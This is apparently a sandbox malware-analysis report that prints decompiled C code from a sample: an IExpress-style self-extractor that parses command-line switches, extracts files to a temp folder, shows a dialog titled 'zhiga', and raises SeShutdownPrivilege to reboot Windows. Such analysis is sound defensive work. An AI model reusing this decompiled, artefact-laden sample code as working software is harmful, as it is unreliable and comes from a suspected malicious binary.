                                                          								} else {
                                                          									_t69 =  *_t69;
                                                          									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                          										break;
                                                          									} else {
                                                          										_t69 = _v272;
                                                          										L21:
                                                          										_t155 =  *_t69;
                                                          										if(_t155 != 0x22) {
                                                          											if(_t202 >= 0x104) {
                                                          												goto L106;
                                                          											} else {
                                                          												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                          												_t177 = _t177 + 1;
                                                          												_t202 = _t202 + 1;
                                                          												_t157 = 1;
                                                          												goto L30;
                                                          											}
                                                          										} else {
                                                          											if(_v272[1] == 0x22) {
                                                          												if(_t202 >= 0x104) {
                                                          													L106:
                                                          													_t63 = 0;
                                                          													L125:
                                                          													_pop(_t210);
                                                          													_pop(_t212);
                                                          													_pop(_t162);
                                                          													return E01096CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                          												} else {
                                                          													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                          													_t177 = _t177 + 1;
                                                          													_t202 = _t202 + 1;
                                                          													_t157 = 2;
                                                          													goto L30;
                                                          												}
                                                          											} else {
                                                          												_t157 = 1;
                                                          												if(_t213 != 0) {
                                                          													_t163 = 1;
                                                          												} else {
                                                          													_t213 = 1;
                                                          												}
                                                          												goto L30;
                                                          											}
                                                          										}
                                                          									}
                                                          								}
                                                          								goto L131;
                                                          								L30:
                                                          								_v272 =  &(_v272[_t157]);
                                                          								_t69 = _v272;
                                                          							} while ( *_t69 != 0);
                                                          							if(_t177 >= 0x104) {
                                                          								E01096E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                          								asm("int3");
                                                          								_push(_t221);
                                                          								_t222 = _t223;
                                                          								_t71 =  *0x1098004; // 0x8a9c601
                                                          								_v296 = _t71 ^ _t223;
                                                          								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                          									0x4f0 = 2;
                                                          									_t75 = E0109597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                          								} else {
                                                          									E010944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                          									 *0x1099124 = E01096285();
                                                          									_t75 = 0;
                                                          								}
                                                          								return E01096CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                          							} else {
                                                          								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                          								if(_t213 == 0) {
                                                          									if(_t163 != 0) {
                                                          										goto L34;
                                                          									} else {
                                                          										goto L40;
                                                          									}
                                                          								} else {
                                                          									if(_t163 != 0) {
                                                          										L40:
                                                          										_t79 = _v268;
                                                          										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                          											_t83 = CharUpperA(_v267) - 0x3f;
                                                          											if(_t83 == 0) {
                                                          												_t202 = 0x521;
                                                          												E010944B9(0, 0x521, 0x1091140, 0, 0x40, 0);
                                                          												_t85 =  *0x1098588; // 0x0
                                                          												if(_t85 != 0) {
                                                          													CloseHandle(_t85);
                                                          												}
                                                          												ExitProcess(0);
                                                          											}
                                                          											_t87 = _t83 - 4;
                                                          											if(_t87 == 0) {
                                                          												if(_v266 != 0) {
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t215 =  &_v268 + _t167;
                                                          														_t183 =  &_v268 + _t167;
                                                          														_t50 = _t183 + 1; // 0x1
                                                          														_t202 = _t50;
                                                          														do {
                                                          															_t88 =  *_t183;
                                                          															_t183 = _t183 + 1;
                                                          														} while (_t88 != 0);
                                                          														if(_t183 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t205 = 0x5b;
                                                          															if(E0109667F(_t215, _t205) == 0) {
                                                          																L115:
                                                          																_t206 = 0x5d;
                                                          																if(E0109667F(_t215, _t206) == 0) {
                                                          																	L117:
                                                          																	_t202 =  &_v276;
                                                          																	_v276 = _t167;
                                                          																	if(E01095C17(_t215,  &_v276) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		_t202 = 0x104;
                                                          																		E01091680(0x1098c42, 0x104, _v276 + _t167 +  &_v268);
                                                          																	}
                                                          																} else {
                                                          																	_t202 = 0x5b;
                                                          																	if(E0109667F(_t215, _t202) == 0) {
                                                          																		goto L49;
                                                          																	} else {
                                                          																		goto L117;
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																_t202 = 0x5d;
                                                          																if(E0109667F(_t215, _t202) == 0) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	goto L115;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													 *0x1098a24 = 1;
                                                          												}
                                                          												goto L50;
                                                          											} else {
                                                          												_t100 = _t87 - 1;
                                                          												if(_t100 == 0) {
                                                          													L98:
                                                          													if(_v266 != 0x3a) {
                                                          														goto L49;
                                                          													} else {
                                                          														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                          														_t217 =  &_v268 + _t170;
                                                          														_t192 =  &_v268 + _t170;
                                                          														_t38 = _t192 + 1; // 0x1
                                                          														_t202 = _t38;
                                                          														do {
                                                          															_t101 =  *_t192;
                                                          															_t192 = _t192 + 1;
                                                          														} while (_t101 != 0);
                                                          														if(_t192 == _t202) {
                                                          															goto L49;
                                                          														} else {
                                                          															_t202 =  &_v276;
                                                          															_v276 = _t170;
                                                          															if(E01095C17(_t217,  &_v276) == 0) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t104 = CharUpperA(_v267);
                                                          																_t218 = 0x1098b3e;
                                                          																_t105 = _v276;
                                                          																if(_t104 != 0x54) {
                                                          																	_t218 = 0x1098a3a;
                                                          																}
                                                          																E01091680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                          																_t202 = 0x104;
                                                          																E0109658A(_t218, 0x104, 0x1091140);
                                                          																if(E010931E0(_t218) != 0) {
                                                          																	goto L50;
                                                          																} else {
                                                          																	goto L106;
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												} else {
                                                          													_t111 = _t100 - 0xa;
                                                          													if(_t111 == 0) {
                                                          														if(_v266 != 0) {
                                                          															if(_v266 != 0x3a) {
                                                          																goto L49;
                                                          															} else {
                                                          																_t199 = _v265;
                                                          																if(_t199 != 0) {
                                                          																	_t219 =  &_v265;
                                                          																	do {
                                                          																		_t219 = _t219 + 1;
                                                          																		_t115 = CharUpperA(_t199) - 0x45;
                                                          																		if(_t115 == 0) {
                                                          																			 *0x1098a2c = 1;
                                                          																		} else {
                                                          																			_t200 = 2;
                                                          																			_t119 = _t115 - _t200;
                                                          																			if(_t119 == 0) {
                                                          																				 *0x1098a30 = 1;
                                                          																			} else {
                                                          																				if(_t119 == 0xf) {
                                                          																					 *0x1098a34 = 1;
                                                          																				} else {
                                                          																					_t209 = 0;
                                                          																				}
                                                          																			}
                                                          																		}
                                                          																		_t118 =  *_t219;
                                                          																		_t199 = _t118;
                                                          																	} while (_t118 != 0);
                                                          																}
                                                          															}
                                                          														} else {
                                                          															 *0x1098a2c = 1;
                                                          														}
                                                          														goto L50;
                                                          													} else {
                                                          														_t127 = _t111 - 3;
                                                          														if(_t127 == 0) {
                                                          															if(_v266 != 0) {
                                                          																if(_v266 != 0x3a) {
                                                          																	goto L49;
                                                          																} else {
                                                          																	_t129 = CharUpperA(_v265);
                                                          																	if(_t129 == 0x31) {
                                                          																		goto L76;
                                                          																	} else {
                                                          																		if(_t129 == 0x41) {
                                                          																			goto L83;
                                                          																		} else {
                                                          																			if(_t129 == 0x55) {
                                                          																				goto L76;
                                                          																			} else {
                                                          																				goto L49;
                                                          																			}
                                                          																		}
                                                          																	}
                                                          																}
                                                          															} else {
                                                          																L76:
                                                          																_push(2);
                                                          																_pop(1);
                                                          																L83:
                                                          																 *0x1098a38 = 1;
                                                          															}
                                                          															goto L50;
                                                          														} else {
                                                          															_t132 = _t127 - 1;
                                                          															if(_t132 == 0) {
                                                          																if(_v266 != 0) {
                                                          																	if(_v266 != 0x3a) {
                                                          																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                          																			goto L49;
                                                          																		}
                                                          																	} else {
                                                          																		_t201 = _v265;
                                                          																		 *0x1099a2c = 1;
                                                          																		if(_t201 != 0) {
                                                          																			_t220 =  &_v265;
                                                          																			do {
                                                          																				_t220 = _t220 + 1;
                                                          																				_t142 = CharUpperA(_t201) - 0x41;
                                                          																				if(_t142 == 0) {
                                                          																					_t143 = 2;
                                                          																					 *0x1099a2c =  *0x1099a2c | _t143;
                                                          																					goto L70;
                                                          																				} else {
                                                          																					_t145 = _t142 - 3;
                                                          																					if(_t145 == 0) {
                                                          																						 *0x1098d48 =  *0x1098d48 | 0x00000040;
                                                          																					} else {
                                                          																						_t146 = _t145 - 5;
                                                          																						if(_t146 == 0) {
                                                          																							 *0x1099a2c =  *0x1099a2c & 0xfffffffd;
                                                          																							goto L70;
                                                          																						} else {
                                                          																							_t147 = _t146 - 5;
                                                          																							if(_t147 == 0) {
                                                          																								 *0x1099a2c =  *0x1099a2c & 0xfffffffe;
                                                          																								goto L70;
                                                          																							} else {
                                                          																								_t149 = _t147;
                                                          																								if(_t149 == 0) {
                                                          																									 *0x1098d48 =  *0x1098d48 | 0x00000080;
                                                          																								} else {
                                                          																									if(_t149 == 3) {
                                                          																										 *0x1099a2c =  *0x1099a2c | 0x00000004;
                                                          																										L70:
                                                          																										 *0x1098a28 = 1;
                                                          																									} else {
                                                          																										_t209 = 0;
                                                          																									}
                                                          																								}
                                                          																							}
                                                          																						}
                                                          																					}
                                                          																				}
                                                          																				_t144 =  *_t220;
                                                          																				_t201 = _t144;
                                                          																			} while (_t144 != 0);
                                                          																		}
                                                          																	}
                                                          																} else {
                                                          																	 *0x1099a2c = 3;
                                                          																	 *0x1098a28 = 1;
                                                          																}
                                                          																goto L50;
                                                          															} else {
                                                          																if(_t132 == 0) {
                                                          																	goto L98;
                                                          																} else {
                                                          																	L49:
                                                          																	_t209 = 0;
                                                          																	L50:
                                                          																	_t173 = _v272;
                                                          																	if( *_t173 != 0) {
                                                          																		goto L2;
                                                          																	} else {
                                                          																		break;
                                                          																	}
                                                          																}
                                                          															}
                                                          														}
                                                          													}
                                                          												}
                                                          											}
                                                          										} else {
                                                          											goto L106;
                                                          										}
                                                          									} else {
                                                          										L34:
                                                          										_t209 = 0;
                                                          										break;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L131;
                                                          					}
                                                          					if( *0x1098a2c != 0 &&  *0x1098b3e == 0) {
                                                          						if(GetModuleFileNameA( *0x1099a3c, 0x1098b3e, 0x104) == 0) {
                                                          							_t209 = 0;
                                                          						} else {
                                                          							_t202 = 0x5c;
                                                          							 *((char*)(E010966C8(0x1098b3e, _t202) + 1)) = 0;
                                                          						}
                                                          					}
                                                          					_t63 = _t209;
                                                          				}
                                                          				L131:
                                                          			}

                                                          0x01095ed4
                                                          0x01095ea2
                                                          0x01095ea4
                                                          0x01095eaf
                                                          0x01095eaf
                                                          0x00000000
                                                          0x01095e79
                                                          0x01095e7d
                                                          0x00000000
                                                          0x01095e83
                                                          0x01095e83
                                                          0x01095e83
                                                          0x01095e85
                                                          0x01095e85
                                                          0x01095e8e
                                                          0x00000000
                                                          0x01095e94
                                                          0x00000000
                                                          0x01095e94
                                                          0x01095e8e
                                                          0x01095e7d
                                                          0x01095e77
                                                          0x01095e6e
                                                          0x01095e65
                                                          0x01095e5c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01095dd0
                                                          0x01095dd0
                                                          0x01095dd0
                                                          0x00000000
                                                          0x01095dd0
                                                          0x01095dce
                                                          0x01095dca
                                                          0x01095dba
                                                          0x00000000
                                                          0x01095d00
                                                          0x01095dd9
                                                          0x01095e04
                                                          0x010961fe
                                                          0x01095e0a
                                                          0x01095e0c
                                                          0x01095e17
                                                          0x01095e17
                                                          0x01095e04
                                                          0x01096200
                                                          0x01096200
                                                          0x00000000

                                                          APIs
                                                          • CharNextA.USER32(?,00000000,?,?), ref: 01095CEE
                                                          • GetModuleFileNameA.KERNEL32(01098B3E,00000104,00000000,?,?), ref: 01095DFC
                                                          • CharUpperA.USER32(?), ref: 01095E3E
                                                          • CharUpperA.USER32(-00000052), ref: 01095EE1
                                                          • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 01095F6F
                                                          • CharUpperA.USER32(?), ref: 01095FA7
                                                          • CharUpperA.USER32(-0000004E), ref: 01096008
                                                          • CharUpperA.USER32(?), ref: 010960AA
                                                          • CloseHandle.KERNEL32(00000000,01091140,00000000,00000040,00000000), ref: 010961F1
                                                          • ExitProcess.KERNEL32 ref: 010961F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                          • String ID: "$"$:$RegServer
                                                          • API String ID: 1203814774-25366791
                                                          • Opcode ID: 538acd610305764a2c0f53fa1df6171693a23b637b73ad32ed2dd7fe441367f9
                                                          • Instruction ID: a0de85d0c2accb2227364881e6c72a7e23e74f4504cc3c7373709b1e13642114
                                                          • Opcode Fuzzy Hash: 538acd610305764a2c0f53fa1df6171693a23b637b73ad32ed2dd7fe441367f9
                                                          • Instruction Fuzzy Hash: 61D17E71A042495EEF778B3E8C783FA3FF1A706354F0481DBC6D6C6195D67A8982AB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 60%
                                                          			E01091F90(signed int __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				int _v12;
                                                          				struct _TOKEN_PRIVILEGES _v24;
                                                          				void* _v28;
                                                          				void* __ebx;
                                                          				signed int _t13;
                                                          				int _t21;
                                                          				void* _t25;
                                                          				int _t28;
                                                          				signed char _t30;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          				void* _t41;
                                                          				signed int _t46;
                                                          
                                                          				_t41 = __esi;
                                                          				_t38 = __edi;
                                                          				_t30 = __ecx;
                                                          				if((__ecx & 0x00000002) != 0) {
                                                          					L12:
                                                          					if((_t30 & 0x00000004) != 0) {
                                                          						L14:
                                                          						if( *0x1099a40 != 0) {
                                                          							_pop(_t30);
                                                          							_t44 = _t46;
                                                          							_t13 =  *0x1098004; // 0x8a9c601
                                                          							_v8 = _t13 ^ _t46;
                                                          							_push(_t38);
                                                          							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                          								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                          								_v24.PrivilegeCount = 1;
                                                          								_v12 = 2;
                                                          								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                          								CloseHandle(_v28);
                                                          								_t41 = _t41;
                                                          								_push(0);
                                                          								if(_t21 != 0) {
                                                          									if(ExitWindowsEx(2, ??) != 0) {
                                                          										_t25 = 1;
                                                          									} else {
                                                          										_t37 = 0x4f7;
                                                          										goto L3;
                                                          									}
                                                          								} else {
                                                          									_t37 = 0x4f6;
                                                          									goto L4;
                                                          								}
                                                          							} else {
                                                          								_t37 = 0x4f5;
                                                          								L3:
                                                          								_push(0);
                                                          								L4:
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								E010944B9(0, _t37);
                                                          								_t25 = 0;
                                                          							}
                                                          							_pop(_t40);
                                                          							return E01096CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                          						} else {
                                                          							_t28 = ExitWindowsEx(2, 0);
                                                          							goto L16;
                                                          						}
                                                          					} else {
                                                          						_t37 = 0x522;
                                                          						_t28 = E010944B9(0, 0x522, 0x1091140, 0, 0x40, 4);
                                                          						if(_t28 != 6) {
                                                          							goto L16;
                                                          						} else {
                                                          							goto L14;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					__eax = E01091EA7(__ecx);
                                                          					if(__eax != 2) {
                                                          						L16:
                                                          						return _t28;
                                                          					} else {
                                                          						goto L12;
                                                          					}
                                                          				}
                                                          			}


                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 01091EFB
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 01091F02
                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 01091FD3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitOpenTokenWindows
                                                          • String ID: SeShutdownPrivilege
                                                          • API String ID: 2795981589-3733053543
                                                          • Opcode ID: 9982898be80a59aa2750943d4136e88240118f89c7516d6ce895502c5e1e2349
                                                          • Instruction ID: 7f9f84be964a01865d7f751de8b14f3f790b43a9c41c328f1218909e3f5c9e7e
                                                          • Opcode Fuzzy Hash: 9982898be80a59aa2750943d4136e88240118f89c7516d6ce895502c5e1e2349
                                                          • Instruction Fuzzy Hash: 9321E7B1B4020ABBDF315AA59C79FBF76B8EBC5B60F100059FA82D61C5D77A8401A361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E01096CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                          
                                                          				SetUnhandledExceptionFilter(0);
                                                          				UnhandledExceptionFilter(_a4);
                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                          			}




                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,01096E26,01091000), ref: 01096CF7
                                                          • UnhandledExceptionFilter.KERNEL32(01096E26,?,01096E26,01091000), ref: 01096D00
                                                          • GetCurrentProcess.KERNEL32(C0000409,?,01096E26,01091000), ref: 01096D0B
                                                          • TerminateProcess.KERNEL32(00000000,?,01096E26,01091000), ref: 01096D12
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                          • String ID:
                                                          • API String ID: 3231755760-0
                                                          • Opcode ID: 7f3d20d158bfdcdf2d592b89497915707de2543b6209d3c6a602b09be30d5fd3
                                                          • Instruction ID: 74ad287f58c5bc90812a61761bd8861331637dc1245e21412c7389a8d6458873
                                                          • Opcode Fuzzy Hash: 7f3d20d158bfdcdf2d592b89497915707de2543b6209d3c6a602b09be30d5fd3
                                                          • Instruction Fuzzy Hash: 4AD012B2200108FBDB202BF1F82CA593F28FB88392F444000F35D83014CB3B4451CB51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 76%
                                                          			E01093210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				void* __edi;
                                                          				void* _t6;
                                                          				void* _t10;
                                                          				int _t20;
                                                          				int _t21;
                                                          				int _t23;
                                                          				char _t24;
                                                          				long _t25;
                                                          				int _t27;
                                                          				int _t30;
                                                          				void* _t32;
                                                          				int _t33;
                                                          				int _t34;
                                                          				int _t37;
                                                          				int _t38;
                                                          				int _t39;
                                                          				void* _t42;
                                                          				void* _t46;
                                                          				CHAR* _t49;
                                                          				void* _t58;
                                                          				void* _t63;
                                                          				struct HWND__* _t64;
                                                          
                                                          				_t64 = _a4;
                                                          				_t6 = _a8 - 0x10;
                                                          				if(_t6 == 0) {
                                                          					_push(0);
                                                          					L38:
                                                          					EndDialog(_t64, ??);
                                                          					L39:
                                                          					__eflags = 1;
                                                          					return 1;
                                                          				}
                                                          				_t42 = 1;
                                                          				_t10 = _t6 - 0x100;
                                                          				if(_t10 == 0) {
                                                          					E010943D0(_t64, GetDesktopWindow());
                                                          					SetWindowTextA(_t64, "zhiga");
                                                          					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                          					__eflags =  *0x1099a40 - _t42; // 0x3
                                                          					if(__eflags == 0) {
                                                          						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                          					}
                                                          					L36:
                                                          					return _t42;
                                                          				}
                                                          				if(_t10 == _t42) {
                                                          					_t20 = _a12 - 1;
                                                          					__eflags = _t20;
                                                          					if(_t20 == 0) {
                                                          						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10991e4, 0x104);
                                                          						__eflags = _t21;
                                                          						if(_t21 == 0) {
                                                          							L32:
                                                          							_t58 = 0x4bf;
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0);
                                                          							L25:
                                                          							E010944B9(_t64, _t58);
                                                          							goto L39;
                                                          						}
                                                          						_t49 = 0x10991e4;
                                                          						do {
                                                          							_t23 =  *_t49;
                                                          							_t49 =  &(_t49[1]);
                                                          							__eflags = _t23;
                                                          						} while (_t23 != 0);
                                                          						__eflags = _t49 - 0x10991e5 - 3;
                                                          						if(_t49 - 0x10991e5 < 3) {
                                                          							goto L32;
                                                          						}
                                                          						_t24 =  *0x10991e5; // 0x3a
                                                          						__eflags = _t24 - 0x3a;
                                                          						if(_t24 == 0x3a) {
                                                          							L21:
                                                          							_t25 = GetFileAttributesA(0x10991e4);
                                                          							__eflags = _t25 - 0xffffffff;
                                                          							if(_t25 != 0xffffffff) {
                                                          								L26:
                                                          								E0109658A(0x10991e4, 0x104, 0x1091140);
                                                          								_t27 = E010958C8(0x10991e4);
                                                          								__eflags = _t27;
                                                          								if(_t27 != 0) {
                                                          									__eflags =  *0x10991e4 - 0x5c;
                                                          									if( *0x10991e4 != 0x5c) {
                                                          										L30:
                                                          										_t30 = E0109597D(0x10991e4, 1, _t64, 1);
                                                          										__eflags = _t30;
                                                          										if(_t30 == 0) {
                                                          											L35:
                                                          											_t42 = 1;
                                                          											__eflags = 1;
                                                          											goto L36;
                                                          										}
                                                          										L31:
                                                          										_t42 = 1;
                                                          										EndDialog(_t64, 1);
                                                          										goto L36;
                                                          									}
                                                          									__eflags =  *0x10991e5 - 0x5c;
                                                          									if( *0x10991e5 == 0x5c) {
                                                          										goto L31;
                                                          									}
                                                          									goto L30;
                                                          								}
                                                          								_push(0);
                                                          								_push(0x10);
                                                          								_push(0);
                                                          								_push(0);
                                                          								_t58 = 0x4be;
                                                          								goto L25;
                                                          							}
                                                          							_t32 = E010944B9(_t64, 0x54a, 0x10991e4, 0, 0x20, 4);
                                                          							__eflags = _t32 - 6;
                                                          							if(_t32 != 6) {
                                                          								goto L35;
                                                          							}
                                                          							_t33 = CreateDirectoryA(0x10991e4, 0);
                                                          							__eflags = _t33;
                                                          							if(_t33 != 0) {
                                                          								goto L26;
                                                          							}
                                                          							_push(0);
                                                          							_push(0x10);
                                                          							_push(0);
                                                          							_push(0x10991e4);
                                                          							_t58 = 0x4cb;
                                                          							goto L25;
                                                          						}
                                                          						__eflags =  *0x10991e4 - 0x5c;
                                                          						if( *0x10991e4 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						__eflags = _t24 - 0x5c;
                                                          						if(_t24 != 0x5c) {
                                                          							goto L32;
                                                          						}
                                                          						goto L21;
                                                          					}
                                                          					_t34 = _t20 - 1;
                                                          					__eflags = _t34;
                                                          					if(_t34 == 0) {
                                                          						EndDialog(_t64, 0);
                                                          						 *0x1099124 = 0x800704c7;
                                                          						goto L39;
                                                          					}
                                                          					__eflags = _t34 != 0x834;
                                                          					if(_t34 != 0x834) {
                                                          						goto L36;
                                                          					}
                                                          					_t37 = LoadStringA( *0x1099a3c, 0x3e8, 0x1098598, 0x200);
                                                          					__eflags = _t37;
                                                          					if(_t37 != 0) {
                                                          						_t38 = E01094224(_t64, _t46, _t46);
                                                          						__eflags = _t38;
                                                          						if(_t38 == 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10987a0);
                                                          						__eflags = _t39;
                                                          						if(_t39 != 0) {
                                                          							goto L36;
                                                          						}
                                                          						_t63 = 0x4c0;
                                                          						L9:
                                                          						E010944B9(_t64, _t63, 0, 0, 0x10, 0);
                                                          						_push(0);
                                                          						goto L38;
                                                          					}
                                                          					_t63 = 0x4b1;
                                                          					goto L9;
                                                          				}
                                                          				return 0;
                                                          			}


























                                                          APIs
                                                          • LoadStringA.USER32(000003E8,01098598,00000200), ref: 01093271
                                                          • GetDesktopWindow.USER32 ref: 010933E2
                                                          • SetWindowTextA.USER32(?,zhiga), ref: 010933F7
                                                          • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 01093410
                                                          • GetDlgItem.USER32(?,00000836), ref: 01093426
                                                          • EnableWindow.USER32(00000000), ref: 0109342D
                                                          • EndDialog.USER32(?,00000000), ref: 0109343F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.443134906.0000000001091000.00000020.00000001.01000000.00000004.sdmp, Offset: 01090000, based on PE: true
                                                          • Associated: 00000001.00000002.443126553.0000000001090000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443146015.0000000001098000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109A000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000001.00000002.443153856.000000000109C000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_1090000_bjAg.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$zhiga
                                                          • API String ID: 2418873061-3661535512
                                                          • Opcode ID: d7253111f48baeb1cfe3fcd44e52a15993aafbb321eb4a62f3c80324a021823a
                                                          • Instruction ID: a7f012a3250c858299b0afed8062bd8055a93363132639cb32992a5cac8480cc
                                                          • Opcode Fuzzy Hash: d7253111f48baeb1cfe3fcd44e52a15993aafbb321eb4a62f3c80324a021823a
                                                          • Instruction Fuzzy Hash: AE51E570381240B6EF725A395C7CFBF2D99BB46B54F008068F6C59A1C5DEA99801BB61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 93%
                                                          			E01092CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t13;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				void* _t27;
                                                          				struct HRSRC__* _t31;
                                                          				intOrPtr _t33;
                                                          				void* _t43;
                                                          				void* _t48;
                                                          				signed int _t65;
                                                          				struct HINSTANCE__* _t66;
                                                          				signed int _t67;
                                                          
                                                          				_t13 =  *0x1098004; // 0x8a9c601
                                                          				_v8 = _t13 ^ _t67;
                                                          				_t65 = 0;
                                                          				_t66 = __ecx;
                                                          				_t48 = __edx;
                                                          				 *0x1099a3c = __ecx;
                                                          				memset(0x1099140, 0, 0x8fc);
                                                          				memset(0x1098a20, 0, 0x32c);
                                                          				memset(0x10988c0, 0, 0x104);
                                                          				 *0x10993ec = 1;
                                                          				_t20 = E0109468F("TITLE", 0x1099154, 0x7f);
                                                          				if(_t20 == 0 || _t20 > 0x80) {
                                                          					_t64 = 0x4b1;
                                                          					goto L32;
                                                          				} else {
                                                          					_t27 = CreateEventA(0, 1, 1, 0);
                                                          					 *0x109858c = _t27;
                                                          					SetEvent(_t27);
                                                          					_t64 = 0x1099a34;
                                                          					if(E0109468F("EXTRACTOPT", 0x1099a34, 4) != 0) {
                                                          						if(( *0x1099a34 & 0x000000c0) == 0) {
                                                          							L12:
                                                          							 *0x1099120 =  *0x1099120 & _t65;
                                                          							if(E01095C9E(_t48, _t48, _t65, _t66) != 0) {
                                                          								if( *0x1098a3a == 0) {
                                                          									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                          									if(_t31 != 0) {
                                                          										_t65 = LoadResource(_t66, _t31);
                                                          									}
                                                          									if( *0x1098184 != 0) {
                                                          										__imp__#17();
                                                          									}
                                                          									if( *0x1098a24 == 0) {
